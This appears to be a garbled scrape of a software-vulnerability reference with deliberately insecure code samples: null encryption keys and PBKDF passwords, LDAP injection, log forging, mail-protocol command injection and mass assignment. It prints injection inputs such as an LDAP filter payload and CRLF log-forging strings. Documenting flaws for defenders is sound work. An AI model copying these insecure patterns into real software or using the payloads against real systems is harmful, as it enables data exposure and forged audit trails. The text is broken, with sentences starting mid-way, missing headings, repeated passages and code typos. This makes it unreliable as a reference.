encryption key, and anyone employing even basic cracking techniques is much more likely to successfully decrypt any encrypted data. After the program ships, a software patch is required to change the null
encryption key. An employee with access to this information can use it to break into the system. Even if attackers only had access to the application's executable, they could extract evidence of the use of a null
encryption key.Null
encryption keys can compromise security in a way that is not easy to remedy.null
encryption key. Not only does using a null
encryption key significantly reduce the protection afforded by a good encryption algorithm, but it also makes fixing the problem extremely difficult. After the offending code is in production, a software patch is required to change the null
encryption key. If an account protected by the null
encryption key is compromised, the owners of the system must choose between security and availability.null
encryption key:
...
CCCrypt(UInt32(kCCEncrypt),
UInt32(kCCAlgorithmAES128),
UInt32(kCCOptionPKCS7Padding),
nil,
0,
iv,
plaintext,
plaintext.length,
ciphertext.mutableBytes,
ciphertext.length,
&numBytesEncrypted)
...
null
encryption key, but anyone with even basic cracking techniques is much more likely to successfully decrypt any encrypted data. After the program ships, a software patch is required to change the null
encryption key. An employee with access to this information can use it to break into the system. Even if attackers only had access to the application's executable, they could extract evidence of the use of a null
encryption key.null
encryption key because it significantly reduces the protection afforded by a good encryption algorithm, but it also makes fixing the problem extremely difficult. After the offending code is in production, a software patch is required to change the null
encryption key. If an account that is protected by the null
encryption key is compromised, the owners of the system must choose between security and availability.null
encryption key:
...
Dim encryptionKey As String
Set encryptionKey = vbNullString
Dim AES As New System.Security.Cryptography.RijndaelManaged
On Error GoTo ErrorHandler
AES.Key = System.Text.Encoding.ASCII.GetBytes(encryptionKey)
...
Exit Sub
...
null
encryption key, but anyone with even basic cracking techniques is much more likely to successfully decrypt any encrypted data. After the application has shipped, a software patch is required to change the null
encryption key. An employee with access to this information can use it to break into the system. Even if attackers only had access to the application's executable, they could extract evidence of the use of a null
encryption key.null
password may compromise system security in a way that is not easy to remedy.null
value as the password argument to a cryptographic password-based key derivation function. In this scenario, the resulting derived key will be based solely on the provided salt (rendering it significantly weaker), and fixing the problem is extremely difficult. After the offending code is in production, the null
password often cannot be changed without patching the software. If an account protected by a derived key based on a null
password is compromised, the owners of the system might be forced to choose between security and availability.null
value as the password argument to a cryptographic password-based key derivation function:
...
var encryptor = new StrongPasswordEncryptor();
var encryptedPassword = encryptor.encryptPassword(null);
...
null
password argument, but anyone with even basic cracking techniques is much more likely to successfully gain access to any resources protected by the offending keys. If an attacker also has access to the salt value used to generate any of the keys based on a null
password, cracking those keys becomes trivial. After the program ships, there is likely no way to change the null
password unless the program is patched. An employee with access to this information can use it to break into the system. Even if attackers only had access to the application's executable, they could extract evidence of the use of a null
password.null
password may compromise system security in a way that is not easy to remedy.null
value as the password argument to a cryptographic password-based key derivation function. In this scenario, the resulting derived key will be based solely on the provided salt (rendering it significantly weaker), and fixing the problem is extremely difficult. After the offending code is in production, the null
password often cannot be changed without patching the software. If an account protected by a derived key based on a null
password is compromised, the owners of the system might be forced to choose between security and availability.null
value as the password argument to a cryptographic password-based key derivation function:
...
CCKeyDerivationPBKDF(kCCPBKDF2,
nil,
0,
salt,
saltLen
kCCPRFHmacAlgSHA256,
100000,
derivedKey,
derivedKeyLen);
...
null
password argument, but anyone with even basic cracking techniques is much more likely to successfully gain access to any resources protected by the offending keys. If an attacker also has access to the salt value used to generate any of the keys based on a null
password, cracking those keys becomes trivial. After the program ships, there is likely no way to change the null
password unless the program is patched. An employee with access to this information can use it to break into the system. Even if attackers only had access to the application's executable, they could extract evidence of the use of a null
password.null
password may compromise system security in a way that is not easy to remedy.null
value as the password argument to a cryptographic password-based key derivation function. In this scenario, the resulting derived key will be based solely on the provided salt (rendering it significantly weaker), and fixing the problem is extremely difficult. After the offending code is in production, the null
password often cannot be changed without patching the software. If an account protected by a derived key based on a null
password is compromised, the owners of the system might be forced to choose between security and availability.null
value as the password argument to a cryptographic password-based key derivation function:
...
CCKeyDerivationPBKDF(CCPBKDFAlgorithm(kCCPBKDF2),
nil,
0,
salt,
saltLen,
CCPseudoRandomAlgorithm(kCCPRFHmacAlgSHA256),
100000,
derivedKey,
derivedKeyLen)
...
null
password argument, but anyone with even basic cracking techniques is much more likely to successfully gain access to any resources protected by the offending keys. If an attacker also has access to the salt value used to generate any of the keys based on a null
password, cracking those keys becomes trivial. After the program ships, there is likely no way to change the null
password unless the program is patched. An employee with access to this information can use it to break into the system. Even if attackers only had access to the application's executable, they could extract evidence of the use of a null
password.returningObjectFlag
to true
on the javax.naming.directory.SearchControls
instance passed to the search
method or by using a library function that sets this flag on its behalf.
<beans ... >
<authentication-manager>
<ldap-authentication-provider
user-search-filter="(uid={0})"
user-search-base="ou=users,dc=example,dc=org"
group-search-filter="(uniqueMember={0})"
group-search-base="ou=groups,dc=example,dc=org"
group-role-attribute="cn"
role-prefix="ROLE_">
</ldap-authentication-provider>
</authentication-manager>
</beans>
...
DirectorySearcher src =
new DirectorySearcher("(manager=" + managerName.Text + ")");
src.SearchRoot = de;
src.SearchScope = SearchScope.Subtree;
foreach(SearchResult res in src.FindAll()) {
...
}
(manager=Smith, John)
managerName
does not contain any LDAP meta characters. If an attacker enters the string Hacker, Wiley)(|(objectclass=*)
for managerName
, then the query becomes the following:
(manager=Hacker, Wiley)(|(objectclass=*))
|(objectclass=*)
condition causes the filter to match against all entries in the directory, and allows the attacker to retrieve information about the entire pool of users. Depending on the permissions with which the LDAP query is performed, the breadth of this attack may be limited, but if the attacker may control the command structure of the query, such an attack can at least affect all records that the user the LDAP query is executed as can access.
fgets(manager, sizeof(manager), socket);
snprintf(filter, sizeof(filter, "(manager=%s)", manager);
if ( ( rc = ldap_search_ext_s( ld, FIND_DN, LDAP_SCOPE_BASE,
filter, NULL, 0, NULL, NULL, LDAP_NO_LIMIT,
LDAP_NO_LIMIT, &result ) ) == LDAP_SUCCESS ) {
...
}
(manager=Smith, John)
manager
does not contain any LDAP meta characters. If an attacker enters the string Hacker, Wiley)(|(objectclass=*)
for manager
, then the query becomes the following:
(manager=Hacker, Wiley)(|(objectclass=*))
|(objectclass=*)
condition causes the filter to match against all entries in the directory, and allows the attacker to retrieve information about the entire pool of users. Depending on the permissions with which the LDAP query is performed, the breadth of this attack may be limited, but if the attacker may control the command structure of the query, such an attack can at least affect all records that the user the LDAP query is executed as can access.
...
DirContext ctx = new InitialDirContext(env);
String managerName = request.getParameter("managerName");
//retrieve all of the employees who report to a manager
String filter = "(manager=" + managerName + ")";
NamingEnumeration employees = ctx.search("ou=People,dc=example,dc=com",
filter);
...
(manager=Smith, John)
managerName
does not contain any LDAP meta characters. If an attacker enters the string Hacker, Wiley)(|(objectclass=*)
for managerName
, then the query becomes the following:
(manager=Hacker, Wiley)(|(objectclass=*))
|(objectclass=*)
condition causes the filter to match against all entries in the directory, and allows the attacker to retrieve information about the entire pool of users. Depending on the permissions with which the LDAP query is performed, the breadth of this attack may be limited, but if the attacker may control the command structure of the query, such an attack can at least affect all records that the user the LDAP query is executed as can access.
...
$managerName = $_POST["managerName"]];
//retrieve all of the employees who report to a manager
$filter = "(manager=" . $managerName . ")";
$result = ldap_search($ds, "ou=People,dc=example,dc=com", $filter);
...
(manager=Smith, John)
managerName
does not contain any LDAP meta characters. If an attacker enters the string Hacker, Wiley)(|(objectclass=*)
for managerName
, then the query becomes the following:
(manager=Hacker, Wiley)(|(objectclass=*))
|(objectclass=*)
condition causes the filter to match against all entries in the directory, and allows the attacker to retrieve information about the entire pool of users. Depending on the permissions with which the LDAP query is performed, the breadth of this attack may be limited, but if the attacker may control the command structure of the query, such an attack can at least affect all records that the user the LDAP query is executed as can access.ou
string from a hidden field submitted through an HTTP request and uses it to create a new DirectoryEntry
.
...
de = new DirectoryEntry("LDAP://ad.example.com:389/ou="
+ hiddenOU.Text + ",dc=example,dc=com");
...
ou
value. The problem is that the developer failed to leverage the appropriate access control mechanisms necessary to restrict subsequent queries to access only employee records that the current user is permitted to read.dn
string from a socket and uses it to perform an LDAP query.
...
rc = ldap_simple_bind_s( ld, NULL, NULL );
if ( rc != LDAP_SUCCESS ) {
...
}
...
fgets(dn, sizeof(dn), socket);
if ( ( rc = ldap_search_ext_s( ld, dn, LDAP_SCOPE_BASE,
filter, NULL, 0, NULL, NULL, LDAP_NO_LIMIT,
LDAP_NO_LIMIT, &result ) ) != LDAP_SUCCESS ) {
...
dn
string. The problem is that the developer failed to leverage the appropriate access control mechanisms necessary to restrict subsequent queries to access only employee records that the current user is permitted to read.
env.put(Context.SECURITY_AUTHENTICATION, "none");
DirContext ctx = new InitialDirContext(env);
String empID = request.getParameter("empID");
try
{
BasicAttribute attr = new BasicAttribute("empID", empID);
NamingEnumeration employee =
ctx.search("ou=People,dc=example,dc=com",attr);
...
dn
string from the user and uses it to perform an LDAP query.
$dn = $_POST['dn'];
if (ldap_bind($ds)) {
...
try {
$rs = ldap_search($ds, $dn, "ou=People,dc=example,dc=com", $attr);
...
dn
originates from user input and the query is performed under an anonymous bind, an attacker could alter the results of the query by specifying an unexpected dn string. The problem is that the developer failed to leverage the appropriate access control mechanisms necessary to restrict subsequent queries to access only employee records that the current user is permitted to read.
...
DATA log_msg TYPE bal_s_msg.
val = request->get_form_field( 'val' ).
log_msg-msgid = 'XY'.
log_msg-msgty = 'E'.
log_msg-msgno = '123'.
log_msg-msgv1 = 'VAL: '.
log_msg-msgv2 = val.
CALL FUNCTION 'BAL_LOG_MSG_ADD'
EXPORTING
I_S_MSG = log_msg
EXCEPTIONS
LOG_NOT_FOUND = 1
MSG_INCONSISTENT = 2
LOG_IS_FULL = 3
OTHERS = 4.
...
FOO
" for val
, the following entry is logged:
XY E 123 VAL: FOO
FOO XY E 124 VAL: BAR
", the following entry is logged:
XY E 123 VAL: FOO XY E 124 VAL: BAR
var params:Object = LoaderInfo(this.root.loaderInfo).parameters;
var val:String = String(params["username"]);
var value:Number = parseInt(val);
if (value == Number.NaN) {
trace("Failed to parse val = " + val);
}
twenty-one
" for val
, the following entry is logged:
Failed to parse val=twenty-one
twenty-one%0a%0aINFO:+User+logged+out%3dbadguy
", the following entry is logged:
Failed to parse val=twenty-one
User logged out=badguy
...
string val = (string)Session["val"];
try {
int value = Int32.Parse(val);
}
catch (FormatException fe) {
log.Info("Failed to parse val= " + val);
}
...
twenty-one
" for val
, the following entry is logged:
INFO: Failed to parse val=twenty-one
twenty-one%0a%0aINFO:+User+logged+out%3dbadguy
", the following entry is logged:
INFO: Failed to parse val=twenty-one
INFO: User logged out=badguy
long value = strtol(val, &endPtr, 10);
if (*endPtr != '\0')
syslog(LOG_INFO,"Illegal value = %s",val);
...
twenty-one
" for val
, the following entry is logged:
Illegal value=twenty-one
twenty-one\n\nINFO: User logged out=evil
", the following entry is logged:
INFO: Illegal value=twenty-one
INFO: User logged out=evil
...
01 LOGAREA.
05 VALHEADER PIC X(50) VALUE 'VAL: '.
05 VAL PIC X(50).
...
EXEC CICS
WEB READ
FORMFIELD(NAME)
VALUE(VAL)
...
END-EXEC.
EXEC DLI
LOG
FROM(LOGAREA)
LENGTH(50)
END-EXEC.
...
FOO
" for VAL
, the following entry is logged:
VAL: FOO
FOO VAL: BAR
", the following entry is logged:
VAL: FOO VAL: BAR
<cflog file="app_log" application="No" Thread="No"
text="Failed to parse val="#Form.val#">
twenty-one
" for val
, the following entry is logged:
"Information",,"02/28/01","14:50:37",,"Failed to parse val=twenty-one"
twenty-one%0a%0a%22Information%22%2C%2C%2202/28/01%22%2C%2214:53:40%22%2C%2C%22User%20logged%20out:%20badguy%22
", the following entry is logged:
"Information",,"02/28/01","14:50:37",,"Failed to parse val=twenty-one"
"Information",,"02/28/01","14:53:40",,"User logged out: badguy"
func someHandler(w http.ResponseWriter, r *http.Request){
r.parseForm()
name := r.FormValue("name")
logout := r.FormValue("logout")
...
if (logout){
...
} else {
log.Printf("Attempt to log out: name: %s logout: %s", name, logout)
}
}
twenty-one
" for logout
and he was able to create a user with name "admin
", the following entry is logged:
Attempt to log out: name: admin logout: twenty-one
admin+logout:+1+++++++++++++++++++++++
", the following entry is logged:
Attempt to log out: name: admin logout: 1 logout: twenty-one
...
String val = request.getParameter("val");
try {
int value = Integer.parseInt(val);
}
catch (NumberFormatException nfe) {
log.info("Failed to parse val = " + val);
}
...
twenty-one
" for val
, the following entry is logged:
INFO: Failed to parse val=twenty-one
twenty-one%0a%0aINFO:+User+logged+out%3dbadguy
", the following entry is logged:
INFO: Failed to parse val=twenty-one
INFO: User logged out=badguy
Example 1
to the Android platform.
...
String val = this.getIntent().getExtras().getString("val");
try {
int value = Integer.parseInt();
}
catch (NumberFormatException nfe) {
Log.e(TAG, "Failed to parse val = " + val);
}
...
var cp = require('child_process');
var http = require('http');
var url = require('url');
function listener(request, response){
var val = url.parse(request.url, true)['query']['val'];
if (isNaN(val)){
console.log("INFO: Failed to parse val = " + val);
}
...
}
...
http.createServer(listener).listen(8080);
...
twenty-one
" for val
, the following entry is logged:
INFO: Failed to parse val = twenty-one
twenty-one%0a%0aINFO:+User+logged+out%3dbadguy
", the following entry is logged:
INFO: Failed to parse val=twenty-one
INFO: User logged out=badguy
long value = strtol(val, &endPtr, 10);
if (*endPtr != '\0')
NSLog("Illegal value = %s",val);
...
twenty-one
" for val
, the following entry is logged:
INFO: Illegal value=twenty-one
twenty-one\n\nINFO: User logged out=evil
", the following entry is logged:
INFO: Illegal value=twenty-one
INFO: User logged out=evil
<?php
$name =$_GET['name'];
...
$logout =$_GET['logout'];
if(is_numeric($logout))
{
...
}
else
{
trigger_error("Attempt to log out: name: $name logout: $val");
}
?>
twenty-one
" for logout
and he was able to create a user with name "admin
", the following entry is logged:
PHP Notice: Attempt to log out: name: admin logout: twenty-one
admin+logout:+1+++++++++++++++++++++++
", the following entry is logged:
PHP Notice: Attempt to log out: name: admin logout: 1 logout: twenty-one
name = req.field('name')
...
logout = req.field('logout')
if (logout):
...
else:
logger.error("Attempt to log out: name: %s logout: %s" % (name,logout))
twenty-one
" for logout
and he was able to create a user with name "admin
", the following entry is logged:
Attempt to log out: name: admin logout: twenty-one
admin+logout:+1+++++++++++++++++++++++
", the following entry is logged:
Attempt to log out: name: admin logout: 1 logout: twenty-one
...
val = req['val']
unless val.respond_to?(:to_int)
logger.info("Failed to parse val")
logger.info(val)
end
...
twenty-one
" for val
, the following entry is logged:
INFO: Failed to parse val
INFO: twenty-one
twenty-one%0a%0aINFO:+User+logged+out%3dbadguy
", the following entry is logged:
INFO: Failed to parse val
INFO: twenty-one
INFO: User logged out=badguy
...
let num = Int(param)
if num == nil {
NSLog("Illegal value = %@", param)
}
...
twenty-one
" for val
, the following entry is logged:
INFO: Illegal value = twenty-one
twenty-one\n\nINFO: User logged out=evil
", the following entry is logged:
INFO: Illegal value=twenty-one
INFO: User logged out=evil
...
Dim Val As Variant
Dim Value As Integer
Set Val = Request.Form("val")
If IsNumeric(Val) Then
Set Value = Val
Else
App.EventLog "Failed to parse val=" & Val, 1
End If
...
twenty-one
" for val
, the following entry is logged:
Failed to parse val=twenty-one
twenty-one%0a%0a+User+logged+out%3dbadguy
", the following entry is logged:
Failed to parse val=twenty-one
User logged out=badguy
@HttpGet
global static void doGet() {
RestRequest req = RestContext.request;
String val = req.params.get('val');
try {
Integer i = Integer.valueOf(val);
...
} catch (TypeException e) {
System.Debug(LoggingLevel.INFO, 'Failed to parse val: '+val);
}
}
twenty-one
" for val
, the following entry is logged:
Failed to parse val: twenty-one
twenty-one%0a%0aUser+logged+out%3dbadguy
", the following entry is logged:
Failed to parse val: twenty-one
User logged out=badguy
...
String val = request.Params["val"];
try {
int value = Int.Parse(val);
}
catch (FormatException fe) {
log.Info("Failed to parse val = " + val);
}
...
twenty-one
" for val
, the following entry is logged:
INFO: Failed to parse val=twenty-one
twenty-one%0a%0aINFO:+User+logged+out%3dbadguy
", the following entry is logged:
INFO: Failed to parse val=twenty-one
INFO: User logged out=badguy
Example 1
to the Android platform.
...
String val = this.Intent.Extras.GetString("val");
try {
int value = Int.Parse(val);
}
catch (FormatException fe) {
Log.E(TAG, "Failed to parse val = " + val);
}
...
...
var idValue string
idValue = req.URL.Query().Get("id")
num, err := strconv.Atoi(idValue)
if err != nil {
sysLog.Debug("Failed to parse value: " + idValue)
}
...
twenty-one
" for val
, the following entry is logged:
INFO: Failed to parse val=twenty-one
twenty-one%0a%0aINFO:+User+logged+out%3dbadguy
", the following entry is logged:
INFO: Failed to parse val=twenty-one
INFO: User logged out=badguy
...
String val = request.getParameter("val");
try {
int value = Integer.parseInt(val);
}
catch (NumberFormatException nfe) {
log.info("Failed to parse val = " + val);
}
...
twenty-one
" for val
, the following entry is logged:
INFO: Failed to parse val=twenty-one
twenty-one%0a%0aINFO:+User+logged+out%3dbadguy
", the following entry is logged:
INFO: Failed to parse val=twenty-one
INFO: User logged out=badguy
Example 1
to the Android platform.
...
String val = this.getIntent().getExtras().getString("val");
try {
int value = Integer.parseInt();
}
catch (NumberFormatException nfe) {
Log.e(TAG, "Failed to parse val = " + val);
}
...
var cp = require('child_process');
var http = require('http');
var url = require('url');
function listener(request, response){
var val = url.parse(request.url, true)['query']['val'];
if (isNaN(val)){
console.error("INFO: Failed to parse val = " + val);
}
...
}
...
http.createServer(listener).listen(8080);
...
twenty-one
" for val
, the following entry is logged:
INFO: Failed to parse val=twenty-one
twenty-one%0a%0aINFO:+User+logged+out%3dbadguy
", the following entry is logged:
INFO: Failed to parse val=twenty-one
INFO: User logged out=badguy
...
val = request.GET["val"]
try:
int_value = int(val)
except:
logger.debug("Failed to parse val = " + val)
...
twenty-one
" for val
, the following entry is logged:
INFO: Failed to parse val=twenty-one
twenty-one%0a%0aINFO:+User+logged+out%3dbadguy
", the following entry is logged:
INFO: Failed to parse val=twenty-one
INFO: User logged out=badguy
...
val = req['val']
unless val.respond_to?(:to_int)
logger.debug("Failed to parse val")
logger.debug(val)
end
...
twenty-one
" for val
, the following entry is logged:
DEBUG: Failed to parse val
DEBUG: twenty-one
twenty-one%0a%DEBUG:+User+logged+out%3dbadguy
", the following entry is logged:
DEBUG: Failed to parse val
DEBUG: twenty-one
DEBUG: User logged out=badguy
CREATE
command that is sent to the IMAP server. An attacker may use this parameter to modify the command sent to the server and inject new commands using CRLF characters.
...
final String foldername = request.getParameter("folder");
IMAPFolder folder = (IMAPFolder) store.getFolder("INBOX");
...
folder.doCommand(new IMAPFolder.ProtocolCommand() {
@Override
public Object doCommand(IMAPProtocol imapProtocol) throws ProtocolException {
try {
imapProtocol.simpleCommand("CREATE " + foldername, null);
} catch (Exception e) {
// Handle Exception
}
return null;
}
});
...
USER
and PASS
command that is sent to the POP3 server. An attacker may use this parameter to modify the command sent to the server and inject new commands using CRLF characters.
...
String username = request.getParameter("username");
String password = request.getParameter("password");
...
POP3SClient pop3 = new POP3SClient(proto, false);
pop3.login(username, password)
...
VRFY
command that is sent to the SMTP server. An attacker might use this parameter to modify the command sent to the server and inject new commands using CRLF characters.
...
c, err := smtp.Dial(x)
if err != nil {
log.Fatal(err)
}
user := request.FormValue("USER")
c.Verify(user)
...
VRFY
command that is sent to the SMTP server. An attacker may use this parameter to modify the command sent to the server and inject new commands using CRLF characters.
...
String user = request.getParameter("user");
SMTPSSLTransport transport = new SMTPSSLTransport(session,new URLName(Utilities.getProperty("smtp.server")));
transport.connect(Utilities.getProperty("smtp.server"), username, password);
transport.simpleCommand("VRFY " + user);
...
VRFY
command that is sent to the SMTP server. An attacker may use this parameter to modify the command sent to the server and inject new commands using CRLF characters.
...
user = request.GET['user']
session = smtplib.SMTP(smtp_server, smtp_tls_port)
session.ehlo()
session.starttls()
session.login(username, password)
session.docmd("VRFY", user)
...
RegisterModel
or Details
classes:
public ActionResult Register(RegisterModel model)
{
if (ModelState.IsValid)
{
try
{
return RedirectToAction("Index", "Home");
}
catch (MembershipCreateUserException e)
{
ModelState.AddModelError("", "");
}
}
return View(model);
}
RegisterModel
class is defined as:
public class RegisterModel
{
[BindRequired]
[Display(Name = "User name")]
public string UserName { get; set; }
[BindRequired]
[DataType(DataType.Password)]
[Display(Name = "Password")]
public string Password { get; set; }
[DataType(DataType.Password)]
[Display(Name = "Confirm password")]
public string ConfirmPassword { get; set; }
public Details Details { get; set; }
public RegisterModel()
{
Details = new Details();
}
}
Details
class is defined as:Example 2: When using
public class Details
{
public bool IsAdmin { get; set; }
...
}
TryUpdateModel()
or UpdateModel()
in ASP.NET MVC or Web API applications, the model binder will automatically try to bind all HTTP request parameters by default:Example 3: In ASP.NET Web Form applications, the model binder will automatically try to bind all HTTP request parameters when using
public ViewResult Register()
{
var model = new RegisterModel();
TryUpdateModel<RegisterModel>(model);
return View("detail", model);
}
TryUpdateModel()
or UpdateModel()
with IValueProvider interface.
Employee emp = new Employee();
TryUpdateModel(emp, new System.Web.ModelBinding.FormValueProvider(ModelBindingExecutionContext));
if (ModelState.IsValid)
{
db.SaveChanges();
}
Employee
class is defined as:
public class Employee
{
public Employee()
{
IsAdmin = false;
IsManager = false;
}
public string Name { get; set; }
public string Email { get; set; }
public bool IsManager { get; set; }
public bool IsAdmin { get; set; }
}
Booking
class:
<view-state id="enterBookingDetails" model="booking">
<on-render>
<render fragments="body" />
</on-render>
<transition on="proceed" to="reviewBooking">
</transition>
<transition on="cancel" to="cancel" bind="false" />
</view-state>
Booking
class is defined as:
public class Booking implements Serializable {
private Long id;
private User user;
private Hotel hotel;
private Date checkinDate;
private Date checkoutDate;
private String creditCard;
private String creditCardName;
private int creditCardExpiryMonth;
private int creditCardExpiryYear;
private boolean smoking;
private int beds;
private Set<Amenity> amenities;
// Public Getters and Setters
...
}
Order
, Customer
, and Profile
are Microsoft .NET Entity persisted classes.
public class Order {
public string ordered { get; set; }
public List<LineItem> LineItems { get; set; }
pubilc virtual Customer Customer { get; set; }
...
}
public class Customer {
public int CustomerId { get; set; }
...
public virtual Profile Profile { get; set; }
...
}
public class Profile {
public int profileId { get; set; }
public string username { get; set; }
public string password { get; set; }
...
}
OrderController
is the ASP.NET MVC controller class handling the request:
public class OrderController : Controller{
StoreEntities db = new StoreEntities();
...
public String updateOrder(Order order) {
...
db.Orders.Add(order);
db.SaveChanges();
}
}
Order
, Customer
, and Profile
are Hibernate persisted classes.
public class Order {
String ordered;
List lineItems;
Customer cust;
...
}
public class Customer {
String customerId;
...
Profile p;
...
}
public class Profile {
String profileId;
String username;
String password;
...
}
OrderController
is the Spring controller class handling the request:
@Controller
public class OrderController {
...
@RequestMapping("/updateOrder")
public String updateOrder(Order order) {
...
session.save(order);
}
}